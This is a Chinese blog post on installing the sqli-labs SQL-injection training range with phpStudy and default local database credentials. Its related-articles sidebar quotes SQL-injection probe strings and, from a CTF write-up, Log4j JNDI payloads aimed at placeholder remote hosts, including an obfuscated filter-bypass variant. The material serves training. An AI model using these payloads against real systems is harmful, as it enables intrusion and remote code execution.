sqli-labs靶场的搭建与环境的安装

最新推荐文章于 2024-03-19 20:01:13 发布
最新推荐文章于 2024-03-19 20:01:13 发布
阅读量1.2w 收藏 46
点赞数 17
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/107772254
版权

sqli-labs介绍

很多时候新手在学习sql注入的时候,往往找不到合适的靶场进行练习操作。而sqli-labs就是一个适合新手去练习注入的一个专业的SQL注入练习平台,是一个印度程序员写的程序,用来学习sql注入的一个游戏教程。其中包含了各种各样的注入姿势,并适用于GET和POST等场景,包含了以下注入:

1. 基于错误的注入(Union Select)
字符串
整数
2. 报错注入
3. 盲注(基于Bool数据类型注入、基于时间注入)
4. mysql 读写文件
5. 更新查询注入(update )
6. 插入查询注入(insert )
7. Header头部注入(基于Referer注入、基于UserAgent注入、基于cookie注入)
8. 二次注入
9. 绕过WAF
绕过黑名单\过滤器\剥离\注释剥离 OR&AND 剥离空格和注释剥离 UNION和SELECT
10. 绕过addslashes()函数
11. 绕过mysql_real_escape_string()函数(在特殊条件下)
12. 堆叠注入(堆查询注入)
等…

sqli-lab下载地址:

https://github.com/Audi-1/sqli-labs

web环境搭建:

在安装靶场之前,我们还需要搭建web运行环境:
这里直接使用phpstudy进行搭建,phpStudy是一个PHP调试环境的程序集成包。安装后一键启动即可运行web环境:下载地址
下载后安装即可。

sqli-lab靶场搭建:

将下载的sqli-lab压缩包解压到phpstudy的网站根目录中
在这里插入图片描述
在这里插入图片描述
接着修改数据库配置文件如下:
!](https://img-blog.csdnimg.cn/20200803204720279.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM2NjE4OTE4,size_16,color_FFFFFF,t_70)

<?php

//give your mysql connection username n password

$dbuser ='root';

$dbpass ='root';

$dbname ="security";

$host = 'localhost';

$dbname1 = "challenges";
?>

因为phpstudy默认的mysql数据库地址是“127.0.0.1 或 localhost",用户名和密码都是"root"。这里主要是修改’$dbpass‘为root,即自己的数据库密码,默认为root,修改后自然是需要保存文件的,这个不用说相信大家也能知道。

接着浏览器打开“http://127.0.0.1/sqli-labs-master/”访问首页
在这里插入图片描述
点击“Setup/reset Database”使其自动创建数据库,创建表并填充数据。
在这里插入图片描述
安装成功后,这里是有75个part的。在这里插入图片描述
这样就可通过靶场的练习来更好的认识SQL注入漏洞和SQL注入的危害。

keepb1ue
关注
  • 17
    点赞
  • 46
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQLI-LABS环境搭建
12-12
SQLI-LABS环境搭建,里面包含PhpStudy2018和sqli-labs-ma
sqli-labs靶场
02-12
sqli-labs靶场
sqli-labs训练平台靶场详解!!!!
最新发布
ytdd66的博客
03-19 1493
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
2023最新sqli-labs的搭建流程步骤
m0_60571990的博客
02-21 2234
2023最新sqli-labs的搭建流程步骤
SQL注入之sqli-labs环境搭建
weixin_69054284的博客
09-20 2047
往往很多新手在刚学习SQL注入的时候,都需要拥有一个能SQL注入的网站,需要有的。直接去互联网上找的话对新手未免有点太难了,因此:我们一般都是在本地搭建一个能SQL注入测试的网站,那样我们学习SQL注入就容易多了。Sqli-labs是一个印度程序员写的,用来学习的一个游戏教程。
Sqli-labs环境搭建教程(sql注入)
Victor1889的博客
01-06 8604
Sqli-labs环境搭建教程(sql注入)
Sqli-labs-master超详细通关教程(1-23关|基础篇)
热门推荐
weixin_51143375的博客
11-02 2万+
一到四关主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ 'and1=2--+ "and1=2--+ )and1=2--+ ')and1=2--+ ")and1=2--+ "))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的 第一关: 页面正常,考虑是否有字符注入,先加单引号 可以看到提示,存在' '包装,我们加上--+ http://127.0.0.
Sqli-labs靶场搭建(适合新手小白围观)
weixin_72543266的博客
09-12 4925
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sqli-labs搭建方法
m0_73248913的博客
02-01 302
下载成后,解压文件放到www的目录中,修改下载源文件中sql-connections目录下的db-creds.inc。建议使用phpstudy,此软件直接安装就可以(建议2018的版本)利用docker搜索sqli-labs的文件就可以,下载了。接下来,直接点击第一个就可以成初始化,快乐的打靶场了。看看下载下来的sqli-labs的id号就可以上线了。将pass改成你数据库的密码就可以了。随便选一个下载就可以,我选的是第一个。搞定了,可以快乐的打靶场了。稍稍等待就可以了,下载后。
SQL&sqli-labs-master
Jackie's Blog
04-03 629
SQL注入学习&个人sqli-labs-master靶场练习
sqli-labs-master靶场搭建,1-10关详解
GN_QT的博客
08-02 1061
输入数字id =1 and 1=2 --+ 没有报错 尝试了 ' " ') ")id=1' --+ 有回显,但是sql语句都被注释了,不能使用报错注入。id=1') and 1=2 --+再判断数据库名第一位是否大于'a',直到s才报错,说明第一位是s。到4的时候才发生报错,说明一共有三个字段,接下里判断显示字段。时间盲注是猜解正确,页面快速返回,猜解错误,则按照规定时间返回。判断是否由字符注入,输入单引号,双引号进行测试,id=1 and 1=2。实现了报错,") and 1=2 --+
windows环境安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs靶场练习wp的配图.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-labs通关攻略54-65[Challenges]
Keepb1ue的博客
09-02 1万+
Advanced Injections 文章目录Advanced Injectionsless-54less-55less-56less-60less-62less-63less-64less-65 最后一篇补上。 less-54 字符型注入,只不过这里只能限制十次查询,超过十次就会随机更换表名和字段名。也就是说我们要在10次内查询所有结果,这其实是够的。 http://127.0.0.1/sql-labs/less-54/index.php?id=-1' union select 1,version(
2022 Real World CTF体验赛Writeup
Keepb1ue的博客
01-23 7364
还是太菜了 不配打Real World正赛(神仙打架),打打体验赛压压惊。 log4flag 提示log4j,测试payload:${jndi:rmi://xxx.dnslog.cn/Exp} 存在检测,bypass payload:${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.xxx.xxx.xxx:1099/siavc8} 直接搭建jndi服务,尝试反弹shell flag:rwctf{d4b4b837f95542aa9
sqli-labs通关攻略1-22[Basic Injections]
Keepb1ue的博客
08-03 6849
基于单引号的报错字符型注入 先用单引号测试 根据报错信息可以知道多了个单引号,最外边的’‘的单引号可以忽略,它不是SQL语句中的单引号,而是报错提示根据报错位置添加的。很明显sql语句变成’1’’ LIMIT 0,1 ,而我们需要做的是闭合前面的语句,然后在后面拼接我们需要注入查询的语句。 查看源码 跟我们推测的一样,根据SQL语句闭合前面,注释后面的’ 拼接的原SQL语句如下:(红框是我们能控制的$id) 很明显,我们在前面拼接了一个’而把后面的’注释了 这样我们就能进行注入SQL语句进行查询我们想要的信
sqli-labs靶场搭建
09-02
搭建sqli-labs靶场,你可以按照以下步骤进行操作: 1. 首先,你需要下载sqli-labs的压缩包并解压缩。你可以在引用中提到的sqli-labs-master中找到这个压缩包。 2. 打开sqli-labs-master文件夹,在里面找到sqli-connections文件夹,并以记事本的方式打开db-creds.inc文件。这个文件包含了数据库的访问凭证,你需要根据你自己的数据库设置进行相应的修改。 3. 接下来,你需要点击sqli-labs页面中的"Setup/reset Database for labs"按钮,这将自动创建数据库、创建表并填充数据。你可以参考引用中提供的页面来确认是否成功创建了数据库。 4. 当数据库设置成并成功创建后,你可以开始使用sqli-labs靶场进行SQL注入的练习。sqli-labs提供了一系列的漏洞场景和相应的源码,适合新手练习漏洞基础、Web安全、渗透等方面的知识。你可以参考引用中提到的sqli-labs靶场的描述和特点。 需要注意的是,搭建sqli-labs靶场需要一定的数据库和Web服务器的基础知识,如果你对此不太熟悉,建议先学习相关知识再进行搭建。同时,在进行练习时,务必遵循法律和道德规范,仅供学习目的使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [sql-labs靶场环境搭建(手把手教你如何搭建)](https://blog.csdn.net/Joker_Dgh/article/details/123913722)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [sqli-labs-master.zip](https://download.csdn.net/download/weixin_43896279/12252977)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值